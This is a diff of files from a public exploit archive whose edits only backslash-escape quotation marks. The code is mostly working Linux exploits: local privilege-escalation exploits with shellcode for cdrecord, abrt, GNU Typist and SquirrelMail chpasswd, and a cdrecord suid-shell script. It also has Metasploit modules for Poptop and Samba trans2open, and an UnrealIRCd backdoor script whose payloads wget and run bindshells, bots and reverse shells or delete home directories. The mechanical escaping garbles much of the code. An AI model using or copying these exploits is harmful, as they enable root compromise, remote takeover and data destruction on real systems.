-		    $new_retword = pack('l', ($retword));
+		    $new_retword = pack(\'l\', ($retword));
-		    $new_retshell = pack('l', ($retshell));
+		    $new_retshell = pack(\'l\', ($retshell));
                    $buffer2 = $new_retword;
                    $buffer2 .= $nop x 150;
                    $buffer2 .= $shellcode;
                    $buffer2 .= $fmtstring;
-		    exec("$cdrecordpath dev='$buffer2' '$cdrecordpath'");
+		    exec(\"$cdrecordpath dev=\'$buffer2\' \'$cdrecordpath\'\");
 # milw0rm.com [2003-05-14]
--- a/platforms/linux/local/36747.c
+++ b/platforms/linux/local/36747.c
@ -26,19 +26,19 @@
 // $ ./a.out /etc/passwd
 // [ wait a few minutes ]
 // Detected ccpp-2015-04-13-21:54:43-14183.new, attempting to race...
-//     Didn't win, trying again!
+//     Didn\'t win, trying again!
 // Detected ccpp-2015-04-13-21:54:43-14186.new, attempting to race...
-//     Didn't win, trying again!
+//     Didn\'t win, trying again!
 // Detected ccpp-2015-04-13-21:54:43-14191.new, attempting to race...
-//     Didn't win, trying again!
+//     Didn\'t win, trying again!
 // Detected ccpp-2015-04-13-21:54:43-14195.new, attempting to race...
-//     Didn't win, trying again!
+//     Didn\'t win, trying again!
 // Detected ccpp-2015-04-13-21:54:43-14198.new, attempting to race...
 //     Exploit successful...
 // -rw-r--r--. 1 taviso abrt 1751 Sep 26  2014 /etc/passwd
 //
-static const char kAbrtPrefix[] = "/var/tmp/abrt/";
+static const char kAbrtPrefix[] = \"/var/tmp/abrt/\";
 static const size_t kMaxEventBuf = 8192;
 static const size_t kUnlinkAttempts = 8192 * 2;
 static const int kCrashDelay = 10000;
@ -57,27 +57,27 @@ int main(int argc, char **argv)
    // First argument is the filename user wants us to chown().
    if (argc != 2) {
-        errx(EXIT_FAILURE, "please specify filename to chown (e.g. /etc/passwd)");
+        errx(EXIT_FAILURE, \"please specify filename to chown (e.g. /etc/passwd)\");
    }
    // This is required as we need to make different comm names to avoid
    // triggering abrt rate limiting, so we fork()/execve() different names.
-    if (strcmp(argv[1], "crash") == 0) {
+    if (strcmp(argv[1], \"crash\") == 0) {
        __builtin_trap();
    }
    // Setup inotify, and add a watch on the abrt directory.
    if ((fd = inotify_init()) < 0) {
-        err(EXIT_FAILURE, "unable to initialize inotify");
+        err(EXIT_FAILURE, \"unable to initialize inotify\");
    }
    if ((watch = inotify_add_watch(fd, kAbrtPrefix, IN_CREATE)) < 0) {
-        err(EXIT_FAILURE, "failed to create new watch descriptor");
+        err(EXIT_FAILURE, \"failed to create new watch descriptor\");
    }
    // Start causing crashes so that abrt generates reports.
    if ((child = create_abrt_events(*argv)) == -1) {
-        err(EXIT_FAILURE, "failed to generate abrt reports");
+        err(EXIT_FAILURE, \"failed to generate abrt reports\");
    }
    // Now start processing inotify events.
@ -90,7 +90,7 @@ int main(int argc, char **argv)
            char command[1024];
            // If this is a new ccpp report, we can start trying to race it.
-            if (strncmp(ev->name, "ccpp", 4) != 0) {
+            if (strncmp(ev->name, \"ccpp\", 4) != 0) {
                continue;
            }
@ -99,9 +99,9 @@ int main(int argc, char **argv)
            strncat(dirname, ev->name, sizeof dirname);
            strncpy(mapsname, dirname, sizeof dirname);
-            strncat(mapsname, "/maps", sizeof mapsname);
+            strncat(mapsname, \"/maps\", sizeof mapsname);
-            fprintf(stderr, "Detected %s, attempting to race...\n", ev->name);
+            fprintf(stderr, \"Detected %s, attempting to race...\\n\", ev->name);
            // Check if we need to wait for the next event or not.
            while (access(dirname, F_OK) == 0) {
@ -117,7 +117,7 @@ int main(int argc, char **argv)
                        break;
                    }
-                    // This looks good, but doesn't mean we won, it's possible
+                    // This looks good, but doesn\'t mean we won, it\'s possible
                    // chown() might have happened while the file was unlinked.
                    //
                    // Give it a few microseconds to run chown()...just in case
@ -125,31 +125,31 @@ int main(int argc, char **argv)
                    usleep(10);
                    if (stat(argv[1], &statbuf) != 0) {
-                        errx(EXIT_FAILURE, "unable to stat target file %s", argv[1]);
+                        errx(EXIT_FAILURE, \"unable to stat target file %s\", argv[1]);
                    }
                    if (statbuf.st_uid != getuid()) {
                        break;
                    }
-                    fprintf(stderr, "\tExploit successful...\n");
+                    fprintf(stderr, \"\\tExploit successful...\\n\");
-                    // We're the new owner, run ls -l to show user.
+                    // We\'re the new owner, run ls -l to show user.
-                    sprintf(command, "ls -l %s", argv[1]);
+                    sprintf(command, \"ls -l %s\", argv[1]);
                    system(command);
                    return EXIT_SUCCESS;
                }
            }
-            fprintf(stderr, "\tDidn't win, trying again!\n");
+            fprintf(stderr, \"\\tDidn\'t win, trying again!\\n\");
        }
    }
-    err(EXIT_FAILURE, "failed to read inotify event");
+    err(EXIT_FAILURE, \"failed to read inotify event\");
 }
-// This routine attempts to generate new abrt events. We can't just crash,
+// This routine attempts to generate new abrt events. We can\'t just crash,
 // because abrt sanely tries to rate limit report creation, so we need a new
 // comm name for each crash.
 static pid_t create_abrt_events(const char *name)
@ -169,35 +169,35 @@ static pid_t create_abrt_events(const char *name)
        // Choose a new unused filename
        newname = tmpnam(0);
-        // Make sure we're not too fast.
+        // Make sure we\'re not too fast.
        usleep(kCrashDelay);
        // Create a new crashing subprocess.
        if ((pid = fork()) == 0) {
            if (link(name, newname) != 0) {
-                err(EXIT_FAILURE, "failed to create a new exename");
+                err(EXIT_FAILURE, \"failed to create a new exename\");
            }
            // Execute crashing process.
-            execl(newname, newname, "crash", NULL);
+            execl(newname, newname, \"crash\", NULL);
            // This should always work.
-            err(EXIT_FAILURE, "unexpected execve failure");
+            err(EXIT_FAILURE, \"unexpected execve failure\");
        }
        // Reap crashed subprocess.
        if (waitpid(pid, &status, 0) != pid) {
-            err(EXIT_FAILURE, "waitpid failure");
+            err(EXIT_FAILURE, \"waitpid failure\");
        }
        // Clean up the temporary name.
        if (unlink(newname) != 0) {
-            err(EXIT_FAILURE, "failed to clean up");
+            err(EXIT_FAILURE, \"failed to clean up\");
        }
        // Make sure it crashed as expected.
        if (!WIFSIGNALED(status)) {
-            errx(EXIT_FAILURE, "something went wrong");
+            errx(EXIT_FAILURE, \"something went wrong\");
        }
    }
--- a/platforms/linux/local/40634.py
+++ b/platforms/linux/local/40634.py
@ -0,0 +1,58 @@
 # Exploit developed using Exploit Pack v6.5
 # Exploit Author: Juan Sacco - http://www.exploitpack.com -
 # jsacco@exploitpack.com
 # Program affected: GNU Typist
 # Affected value: ARG0
 # Version: 2.9.5-2
 #
 # Tested and developed under:  Kali Linux 2.0 x86 - https://www.kali.org
 # Program description: Simple ncurses touch typing tutor
 # Displays exercise lines, measures your typing speed and
 # accuracy, and displays the results
 # Kali Linux 2.0 package: pool/main/g/gtypist/gtypist_2.9.5-2_i386.deb
 # MD5sum: 7ca59c5c0c494e41735b7be676401357
 # Website: http://www.gnu.org/software/gtypist/
 # gdb$ run `python -c 'print "A"*4098'`
 # 0xb7e95def in __strcpy_chk () from /lib/i386-linux-gnu/libc.so.6
 # 0x0804bf30 in ?? ()
 # 0xb7dbb5f7 in __libc_start_main () from /lib/i386-linux-gnu/libc.so.6
 # 0x0804c393 in ?? ()
 import os, subprocess
 def run():
  try:
    print "# GNU GTypist - Local Buffer Overflow by Juan Sacco"
    print "# This Exploit has been developed using Exploit Pack -
 http://exploitpack.com"
    # NOPSLED + SHELLCODE + EIP
    buffersize = 4098
    nopsled = "\x90"*30
    shellcode =
 "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
    eip = "\x08\xec\xff\xbf"
    buffer = nopsled * (buffersize-len(shellcode)) + eip
    subprocess.call(["gtypist ",' ', buffer])
  except OSError as e:
    if e.errno == os.errno.ENOENT:
        print "Sorry, GNU GTypist - Not found!"
    else:
        print "Error executing exploit"
    raise
 def howtousage():
  print "Snap! Something went wrong"
  sys.exit(-1)
 if __name__ == '__main__':
  try:
    print "Exploit GNU GTypist -  Local Overflow Exploit"
    print "Author: Juan Sacco - Exploit Pack"
  except IndexError:
    howtousage()
 run()
--- a/platforms/linux/local/417.c
+++ b/platforms/linux/local/417.c
@ -30,17 +30,17 @@
 #include <sys/wait.h> 
 #define NOP 0x90 
-#define Fuckpr0 "./chpasswd" /* you need modify it by yourself */ 
+#define Fuckpr0 \"./chpasswd\" /* you need modify it by yourself */ 
 #define LOOP 2000 /* loop of bruteforce */ 
 /* setuid(0) shellcode by by Matias Sedalo 3x ^_^ */ 
-char shellcode[] ="x31xdbx53x8dx43x17xcdx80x99x68x6ex2fx73x68x68" 
+char shellcode[] =\"x31xdbx53x8dx43x17xcdx80x99x68x6ex2fx73x68x68\" 
-"x2fx2fx62x69x89xe3x50x53x89xe1xb0x0bxcdx80"; 
+\"x2fx2fx62x69x89xe3x50x53x89xe1xb0x0bxcdx80\"; 
 unsigned long get_esp() { 
-__asm__ ("movl %esp,%eax"); 
+__asm__ (\"movl %esp,%eax\"); 
 } 
@ -52,7 +52,7 @@ value = malloc(size);
 if(value == NULL){ 
-printf("ERROR:virtual memory exhausted...n"); 
+printf(\"ERROR:virtual memory exhausted...n\"); 
 exit(-1); 
@ -74,16 +74,16 @@ pid_t pid;
 ret_addr = get_esp() - strlen(Fuckpr0) - strlen(shellcode); 
-printf("t-------------------------------------------------------n"); 
+printf(\"t-------------------------------------------------------n\"); 
-printf("t Squirrelmail chpasswd local root bruteforce exploit n"); 
+printf(\"t Squirrelmail chpasswd local root bruteforce exploit n\"); 
-printf("t code By Bytes<Bytes[at]ph4nt0m.org> 2004 n"); 
+printf(\"t code By Bytes<Bytes[at]ph4nt0m.org> 2004 n\"); 
-printf("t http://www.ph4nt0m.net n"); 
+printf(\"t http://www.ph4nt0m.net n\"); 
-printf("t#######################################################n"); 
+printf(\"t#######################################################n\"); 
 sleep(1); 
-printf("[+] Bruteforce......nn"); 
+printf(\"[+] Bruteforce......nn\"); 
 sleep(2); 
@ -105,19 +105,19 @@ for(i=0; i < 150; i+=4){
 } 
-printf("buf1 = %sn",buf1); 
+printf(\"buf1 = %sn\",buf1); 
-execl(Fuckpr0,"chpasswd",buf1,buf2,0); 
+execl(Fuckpr0,\"chpasswd\",buf1,buf2,0); 
 } 
 wait(&status); 
-printf("[-] Signal: #%in", status); 
+printf(\"[-] Signal: #%in\", status); 
 if(WIFEXITED(status) != 0 ) { 
-printf("[=] Step.%i: 0x%xn[~] Exiting...n",(j/2),ret_addr); 
+printf(\"[=] Step.%i: 0x%xn[~] Exiting...n\",(j/2),ret_addr); 
 exit(1); 
@ -127,7 +127,7 @@ ret_addr += offset;
 j += offset; 
-printf("[=] Offset:%d Use ret:0x%xn",j, ret_addr); 
+printf(\"[=] Offset:%d Use ret:0x%xn\",j, ret_addr); 
 } 
--- a/platforms/linux/local/438.c
+++ b/platforms/linux/local/438.c
@ -3,7 +3,7 @@
 #
 # cdrecord-suidshell.sh - I)ruid [CAU] (09.2004)
 #
-# Exploits cdrecord's exec() of $RSH before dropping privs 
+# Exploits cdrecord\'s exec() of $RSH before dropping privs 
 #
 cat > ./cpbinbash.c << __EOF__
@ -17,14 +17,14 @@ int fd1, fd2;
 int count;
 char buffer[1];
-/* Set ID's */
+/* Set ID\'s */
 setuid( geteuid() );
 setgid( geteuid() );
 /* Copy the shell */
-if ((fd1=open( "/bin/bash", O_RDONLY))<0)
+if ((fd1=open( \"/bin/bash\", O_RDONLY))<0)
 return -1;
-if ((fd2=open( "./bash", O_WRONLY|O_CREAT))<0)
+if ((fd2=open( \"./bash\", O_WRONLY|O_CREAT))<0)
 return -1;
 while((count=read(fd1, buffer, 1)))
 write(fd2, buffer, count);
@ -33,8 +33,8 @@ close( fd1 );
 close( fd2 );
 /* Priv the shell */
-chown( "./bash", geteuid(), geteuid() );
+chown( \"./bash\", geteuid(), geteuid() );
-chmod( "./bash", 3565 );
+chmod( \"./bash\", 3565 );
 }
 __EOF__
--- a/platforms/linux/remote/13853.pl
+++ b/platforms/linux/remote/13853.pl
@ -7,53 +7,53 @@ use Socket;
 use IO::Socket;
 ## Payload options
-my $payload1 = 'AB; cd /tmp; wget http://packetstormsecurity.org/groups/synnergy/bindshell-unix -O bindshell; chmod +x bindshell; ./bindshell &';
+my $payload1 = \'AB; cd /tmp; wget http://packetstormsecurity.org/groups/synnergy/bindshell-unix -O bindshell; chmod +x bindshell; ./bindshell &\';
-my $payload2 = 'AB; cd /tmp; wget http://efnetbs.webs.com/bot.txt -O bot; chmod +x bot; ./bot &';
+my $payload2 = \'AB; cd /tmp; wget http://efnetbs.webs.com/bot.txt -O bot; chmod +x bot; ./bot &\';
-my $payload3 = 'AB; cd /tmp; wget http://efnetbs.webs.com/r.txt -O rshell; chmod +x rshell; ./rshell &';
+my $payload3 = \'AB; cd /tmp; wget http://efnetbs.webs.com/r.txt -O rshell; chmod +x rshell; ./rshell &\';
-my $payload4 = 'AB; killall ircd';
+my $payload4 = \'AB; killall ircd\';
-my $payload5 = 'AB; cd ~; /bin/rm -fr ~/*;/bin/rm -fr *';
+my $payload5 = \'AB; cd ~; /bin/rm -fr ~/*;/bin/rm -fr *\';
-$host = "";
+$host = \"\";
-$port = "";
+$port = \"\";
-$type = "";
+$type = \"\";
 $host = @ARGV[0];
 $port = @ARGV[1];
 $type = @ARGV[2];
-if ($host eq "") { usage(); }
+if ($host eq \"\") { usage(); }
-if ($port eq "") { usage(); }
+if ($port eq \"\") { usage(); }
-if ($type eq "") { usage(); }
+if ($type eq \"\") { usage(); }
 sub usage {
-  printf "\nUsage :\n";
+  printf \"\\nUsage :\\n\";
-  printf "perl unrealpwn.pl <host> <port> <type>\n\n";
+  printf \"perl unrealpwn.pl <host> <port> <type>\\n\\n\";
-  printf "Command list :\n";
+  printf \"Command list :\\n\";
-  printf "[1] - Perl Bindshell\n";
+  printf \"[1] - Perl Bindshell\\n\";
-  printf "[2] - Perl Reverse Shell\n";
+  printf \"[2] - Perl Reverse Shell\\n\";
-  printf "[3] - Perl Bot\n";
+  printf \"[3] - Perl Bot\\n\";
-  printf "-----------------------------\n";
+  printf \"-----------------------------\\n\";
-  printf "[4] - shutdown ircserver\n";
+  printf \"[4] - shutdown ircserver\\n\";
-  printf "[5] - delete ircserver\n";
+  printf \"[5] - delete ircserver\\n\";
  exit(1);
 }
 sub unreal_trojan {
  my $ircserv = $host;
  my $ircport = $port;
-  my $sockd = IO::Socket::INET->new (PeerAddr => $ircserv, PeerPort => $ircport, Proto => "tcp") || die "Failed to connect to $ircserv on $ircport ...\n\n";
+  my $sockd = IO::Socket::INET->new (PeerAddr => $ircserv, PeerPort => $ircport, Proto => \"tcp\") || die \"Failed to connect to $ircserv on $ircport ...\\n\\n\";
-  print "[+] Payload sent ...\n";
+  print \"[+] Payload sent ...\\n\";
-  if ($type eq "1") {
+  if ($type eq \"1\") {
-    print $sockd "$payload1";
+    print $sockd \"$payload1\";
-  } elsif ($type eq "2") {
+  } elsif ($type eq \"2\") {
-    print $sockd "$payload2";
+    print $sockd \"$payload2\";
-  } elsif ($type eq "3") {
+  } elsif ($type eq \"3\") {
-    print $sockd "$payload3";
+    print $sockd \"$payload3\";
-  } elsif ($type eq "4") {
+  } elsif ($type eq \"4\") {
-    print $sockd "$payload4";
+    print $sockd \"$payload4\";
-  } elsif ($type eq "5") {
+  } elsif ($type eq \"5\") {
-    print $sockd "$payload5";
+    print $sockd \"$payload5\";
  } else {
-    printf "\nInvalid Option ...\n\n";
+    printf \"\\nInvalid Option ...\\n\\n\";
    usage();
  }
  close($sockd);
--- a/platforms/linux/remote/16845.rb
+++ b/platforms/linux/remote/16845.rb
@ -9,7 +9,7 @@
 # http://metasploit.com/framework/
 ##
-require 'msf/core'
+require \'msf/core\'
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = GreatRanking
@ -19,8 +19,8 @@ class Metasploit3 < Msf::Exploit::Remote
 	def initialize(info = {})
 		super(update_info(info,
-			'Name'           => 'Poptop Negative Read Overflow',
+			\'Name\'           => \'Poptop Negative Read Overflow\',
-			'Description'    => %q{
+			\'Description\'    => %q{
 					This is an exploit for the Poptop negative read overflow.  This will
 				work against versions prior to 1.1.3-b3 and 1.1.3-20030409, but I
 				currently do not have a good way to detect Poptop versions.
@ -31,44 +31,44 @@ class Metasploit3 < Msf::Exploit::Remote
 				Using the current method of exploitation, our socket will be closed
 				before we have the ability to run code, preventing the use of Findsock.
 			},
-			'Author'         => 'spoonm',
+			\'Author\'         => \'spoonm\',
-			'License'        => MSF_LICENSE,
+			\'License\'        => MSF_LICENSE,
-			'Version'        => '$Revision: 11114 $',
+			\'Version\'        => \'$Revision: 11114 $\',
-			'References'     =>
+			\'References\'     =>
 				[
-					['CVE', '2003-0213'],
+					[\'CVE\', \'2003-0213\'],
-					['OSVDB', '3293'],
+					[\'OSVDB\', \'3293\'],
-					['URL',   'http://securityfocus.com/archive/1/317995'],
+					[\'URL\',   \'http://securityfocus.com/archive/1/317995\'],
-					['URL',   'http://www.freewebs.com/blightninjas/'],
+					[\'URL\',   \'http://www.freewebs.com/blightninjas/\'],
 				],
-			'Privileged'     => true,
+			\'Privileged\'     => true,
-			'Payload'        =>
+			\'Payload\'        =>
 				{
 					# Payload space is dynamically determined
-					'MinNops'         => 16,
+					\'MinNops\'         => 16,
-					'StackAdjustment' => -1088,
+					\'StackAdjustment\' => -1088,
-					'Compat'          =>
+					\'Compat\'          =>
 						{
-							'ConnectionType' => '-find',
+							\'ConnectionType\' => \'-find\',
 						}
 				},
-			'SaveRegisters'  => [ 'esp' ],
+			\'SaveRegisters\'  => [ \'esp\' ],
-			'Platform'       => 'linux',
+			\'Platform\'       => \'linux\',
-			'Arch'           => ARCH_X86,
+			\'Arch\'           => ARCH_X86,
-			'Targets'        =>
+			\'Targets\'        =>
 				[
-					['Linux Bruteforce',
+					[\'Linux Bruteforce\',
-						{ 'Bruteforce' =>
+						{ \'Bruteforce\' =>
 							{
-								'Start'  => { 'Ret' => 0xbffffa00 },
+								\'Start\'  => { \'Ret\' => 0xbffffa00 },
-								'Stop'   => { 'Ret' => 0xbffff000 },
+								\'Stop\'   => { \'Ret\' => 0xbffff000 },
-								'Step'   => 0
+								\'Step\'   => 0
 							}
 						}
 					],
 				],
-			'DefaultTarget'  => 0,
+			\'DefaultTarget\'  => 0,
-			'DisclosureDate' => 'Apr 9 2003'))
+			\'DisclosureDate\' => \'Apr 9 2003\'))
 		register_options(
 			[
@ -77,26 +77,26 @@ class Metasploit3 < Msf::Exploit::Remote
 		register_advanced_options(
 			[
-				OptInt.new("PreReturnLength", [ true, "Space before we hit the return address.  Affects PayloadSpace.", 220 ]),
+				OptInt.new(\"PreReturnLength\", [ true, \"Space before we hit the return address.  Affects PayloadSpace.\", 220 ]),
-				OptInt.new("RetLength",       [ true, "Length of returns after payload.", 32 ]),
+				OptInt.new(\"RetLength\",       [ true, \"Length of returns after payload.\", 32 ]),
-				OptInt.new("ExtraSpace",      [ true, "The exploit builds two protocol frames, the header frame and the control frame. ExtraSpace allows you use this space for the payload instead of the protocol (breaking the protocol, but still triggering the bug). If this value is <= 128, it doesn't really disobey the protocol, it just uses the Vendor and Hostname fields for payload data (these should eventually be filled in to look like a real client, ie windows).  I've had successful exploitation with this set to 154, but nothing over 128 is suggested.", 0 ]),
+				OptInt.new(\"ExtraSpace\",      [ true, \"The exploit builds two protocol frames, the header frame and the control frame. ExtraSpace allows you use this space for the payload instead of the protocol (breaking the protocol, but still triggering the bug). If this value is <= 128, it doesn\'t really disobey the protocol, it just uses the Vendor and Hostname fields for payload data (these should eventually be filled in to look like a real client, ie windows).  I\'ve had successful exploitation with this set to 154, but nothing over 128 is suggested.\", 0 ]),
-				OptString.new("Hostname",     [ false, "PPTP Packet hostname", '' ]),
+				OptString.new(\"Hostname\",     [ false, \"PPTP Packet hostname\", \'\' ]),
-				OptString.new("Vendor",       [ true, "PPTP Packet vendor", 'Microsoft Windows NT' ]),
+				OptString.new(\"Vendor\",       [ true, \"PPTP Packet vendor\", \'Microsoft Windows NT\' ]),
 			], self.class)
 	end
 	# Dynamic payload space calculation
 	def payload_space(explicit_target = nil)
-		datastore['PreReturnLength'].to_i + datastore['ExtraSpace'].to_i
+		datastore[\'PreReturnLength\'].to_i + datastore[\'ExtraSpace\'].to_i
 	end
 	def build_packet(length)
-		[length, 1, 0x1a2b3c4d, 1, 0].pack('nnNnn') +
+		[length, 1, 0x1a2b3c4d, 1, 0].pack(\'nnNnn\') +
-			[1,0].pack('cc') +
+			[1,0].pack(\'cc\') +
-			[0].pack('n') +
+			[0].pack(\'n\') +
-			[1,1,0,2600].pack('NNnn') +
+			[1,1,0,2600].pack(\'NNnn\') +
-			datastore['Hostname'].ljust(64, "\x00") +
+			datastore[\'Hostname\'].ljust(64, \"\\x00\") +
-			datastore['Vendor'].ljust(64, "\x00")
+			datastore[\'Vendor\'].ljust(64, \"\\x00\")
 	end
 	def check
@ -114,13 +114,13 @@ class Metasploit3 < Msf::Exploit::Remote
 	def brute_exploit(addrs)
 		connect
-		print_status("Trying #{"%.8x" % addrs['Ret']}...")
+		print_status(\"Trying #{\"%.8x\" % addrs[\'Ret\']}...\")
 		# Construct the evil length packet
 		packet =
 			build_packet(1) +
 			payload.encoded +
-			([addrs['Ret']].pack('V') * (datastore['RetLength'] / 4))
+			([addrs[\'Ret\']].pack(\'V\') * (datastore[\'RetLength\'] / 4))
 		sock.put(packet)
--- a/platforms/linux/remote/16861.rb
+++ b/platforms/linux/remote/16861.rb
@ -9,7 +9,7 @@
 # http://metasploit.com/framework/
 ##
-require 'msf/core'
+require \'msf/core\'
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = GreatRanking
@ -19,8 +19,8 @@ class Metasploit3 < Msf::Exploit::Remote
 	def initialize(info = {})
 		super(update_info(info,
-			'Name'           => 'Samba trans2open Overflow (Linux x86)',
+			\'Name\'           => \'Samba trans2open Overflow (Linux x86)\',
-			'Description'    => %q{
+			\'Description\'    => %q{
 					This exploits the buffer overflow found in Samba versions
 				2.2.0 to 2.2.8. This particular module is capable of
 				exploiting the flaw on x86 Linux systems that do not
@ -29,45 +29,45 @@ class Metasploit3 < Msf::Exploit::Remote
 				NOTE: Some older versions of RedHat do not seem to be vulnerable
 				since they apparently do not allow anonymous access to IPC.
 			},
-			'Author'         => [ 'hdm', 'jduck' ],
+			\'Author\'         => [ \'hdm\', \'jduck\' ],
-			'License'        => MSF_LICENSE,
+			\'License\'        => MSF_LICENSE,
-			'Version'        => '$Revision: 9828 $',
+			\'Version\'        => \'$Revision: 9828 $\',
-			'References'     =>
+			\'References\'     =>
 				[
-					[ 'CVE', '2003-0201' ],
+					[ \'CVE\', \'2003-0201\' ],
-					[ 'OSVDB', '4469' ],
+					[ \'OSVDB\', \'4469\' ],
-					[ 'BID', '7294' ],
+					[ \'BID\', \'7294\' ],
-					[ 'URL', 'http://seclists.org/bugtraq/2003/Apr/103' ]
+					[ \'URL\', \'http://seclists.org/bugtraq/2003/Apr/103\' ]
 				],
-			'Privileged'     => true,
+			\'Privileged\'     => true,
-			'Payload'        =>
+			\'Payload\'        =>
 				{
-					'Space'    => 1024,
+					\'Space\'    => 1024,
-					'BadChars' => "\x00",
+					\'BadChars\' => \"\\x00\",
-					'MinNops'  => 512,
+					\'MinNops\'  => 512,
-					'StackAdjustment' => -3500
+					\'StackAdjustment\' => -3500
 				},
-			'Platform'       => 'linux',
+			\'Platform\'       => \'linux\',
-			'Targets'        =>
+			\'Targets\'        =>
 				[
 					# tested OK - jjd:
 					# RedHat 7.2 samba-2.2.1a-4 - 0xbffffafc
 					# RedHat 9.0 samba-2.2.7a-7.9.0 - 0xbfffddfc
-					[ 'Samba 2.2.x - Bruteforce',
+					[ \'Samba 2.2.x - Bruteforce\',
 						{
-							'PtrToNonZero' => 0xbffffff4, # near the bottom of the stack
+							\'PtrToNonZero\' => 0xbffffff4, # near the bottom of the stack
-							'Offset'       => 1055,
+							\'Offset\'       => 1055,
-							'Bruteforce'   =>
+							\'Bruteforce\'   =>
 								{
-									'Start' => { 'Ret' => 0xbffffdfc },
+									\'Start\' => { \'Ret\' => 0xbffffdfc },
-									'Stop'  => { 'Ret' => 0xbfa00000 },
+									\'Stop\'  => { \'Ret\' => 0xbfa00000 },
-									'Step'  => 256
+									\'Step\'  => 256
 								}
 						}
 					],
 				],
-			'DefaultTarget'  => 0,
+			\'DefaultTarget\'  => 0,
-			'DisclosureDate' => 'Apr 7 2003'
+			\'DisclosureDate\' => \'Apr 7 2003\'
 			))
 		register_options(
@ -78,20 +78,20 @@ class Metasploit3 < Msf::Exploit::Remote
 	def brute_exploit(addrs)
-		curr_ret = addrs['Ret']
+		curr_ret = addrs[\'Ret\']
 		begin
-			print_status("Trying return address 0x%.8x..." %  curr_ret)
+			print_status(\"Trying return address 0x%.8x...\" %  curr_ret)
 			connect
 			smb_login
 			if ! @checked_peerlm
 				if smb_peer_lm !~ /samba/i
-					raise RuntimeError, "This target is not a Samba server (#{smb_peer_lm}"
+					raise RuntimeError, \"This target is not a Samba server (#{smb_peer_lm}\"
 				end
-				if smb_peer_lm =~ /Samba [34]\./i
+				if smb_peer_lm =~ /Samba [34]\\./i
-					raise RuntimeError, "This target is not a vulnerable Samba server (#{smb_peer_lm})"
+					raise RuntimeError, \"This target is not a vulnerable Samba server (#{smb_peer_lm})\"
 				end
 			end
@ -99,7 +99,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			# This value *must* be 1988 to allow findrecv shellcode to work
-			# XXX: I'm not sure the above comment is true...
+			# XXX: I\'m not sure the above comment is true...
 			pattern = rand_text_english(1988)
 			# See the OSX and Solaris versions of this module for additional
@ -107,8 +107,8 @@ class Metasploit3 < Msf::Exploit::Remote
 			# eip_off = 1071 - RH7.2 compiled with -ggdb instead of -O/-O2
 			# (rpmbuild -bp ; edited/reran config.status ; make)
-			eip_off = target['Offset']
+			eip_off = target[\'Offset\']
-			ptr_to_non_zero = target['PtrToNonZero']
+			ptr_to_non_zero = target[\'PtrToNonZero\']
 			# Stuff the shellcode into the request
 			pattern[0, payload.encoded.length] = payload.encoded
@ -119,7 +119,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			# 222       if (IS_IPC(conn)) {
 			# 223          return(ERROR(ERRSRV,ERRaccess));
 			# 224       }
-			pattern[eip_off + 4, 4] = [ptr_to_non_zero - 0x30].pack('V')
+			pattern[eip_off + 4, 4] = [ptr_to_non_zero - 0x30].pack(\'V\')
 			# We want to avoid crashing on the following two derefences.
 			#
@ -127,23 +127,23 @@ class Metasploit3 < Msf::Exploit::Remote
 			# 117     {
 			# 118       int outsize = set_message(outbuf,0,0,True);
 			# 119       int cmd = CVAL(inbuf,smb_com);
-			pattern[eip_off + 8, 4] = [ptr_to_non_zero - 0x08].pack('V')
+			pattern[eip_off + 8, 4] = [ptr_to_non_zero - 0x08].pack(\'V\')
-			pattern[eip_off + 12, 4] = [ptr_to_non_zero - 0x24].pack('V')
+			pattern[eip_off + 12, 4] = [ptr_to_non_zero - 0x24].pack(\'V\')
 			# This stream covers the framepointer and the return address
-			#pattern[1199, 400] = [curr_ret].pack('N') * 100
+			#pattern[1199, 400] = [curr_ret].pack(\'N\') * 100
-			pattern[eip_off, 4] = [curr_ret].pack('V')
+			pattern[eip_off, 4] = [curr_ret].pack(\'V\')
 			trans =
-				"\x00\x04\x08\x20\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x00\x00"+
+				\"\\x00\\x04\\x08\\x20\\xff\\x53\\x4d\\x42\\x32\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"+
-				"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"+
+				\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\"+
-				"\x64\x00\x00\x00\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00"+
+				\"\\x64\\x00\\x00\\x00\\x00\\xd0\\x07\\x0c\\x00\\xd0\\x07\\x0c\\x00\\x00\\x00\\x00\"+
-				"\x00\x00\x00\x00\x00\x00\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01"+
+				\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xd0\\x07\\x43\\x00\\x0c\\x00\\x14\\x08\\x01\"+
-				"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
+				\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"+
-				"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90"+
+				\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x90\"+
 				pattern
-			# puts "press any key"; $stdin.gets
+			# puts \"press any key\"; $stdin.gets
 			sock.put(trans)
 			handler
@ -152,7 +152,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		rescue ::Rex::Proto::SMB::Exceptions::LoginError, ::Interrupt, ::RuntimeError
 			raise $!
 		rescue ::Exception => e
-			print_error("#{rhost} #{e}")
+			print_error(\"#{rhost} #{e}\")
 		end
 		handler
--- a/platforms/linux/remote/16880.rb
+++ b/platforms/linux/remote/16880.rb
@ -9,7 +9,7 @@
 # http://metasploit.com/framework/
 ##
-require 'msf/core'
+require \'msf/core\'
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = GreatRanking
@ -19,51 +19,51 @@ class Metasploit3 < Msf::Exploit::Remote
 	def initialize(info = {})
 		super(update_info(info,
-			'Name'           => 'Samba trans2open Overflow (*BSD x86)',
+			\'Name\'           => \'Samba trans2open Overflow (*BSD x86)\',
-			'Description'    => %q{
+			\'Description\'    => %q{
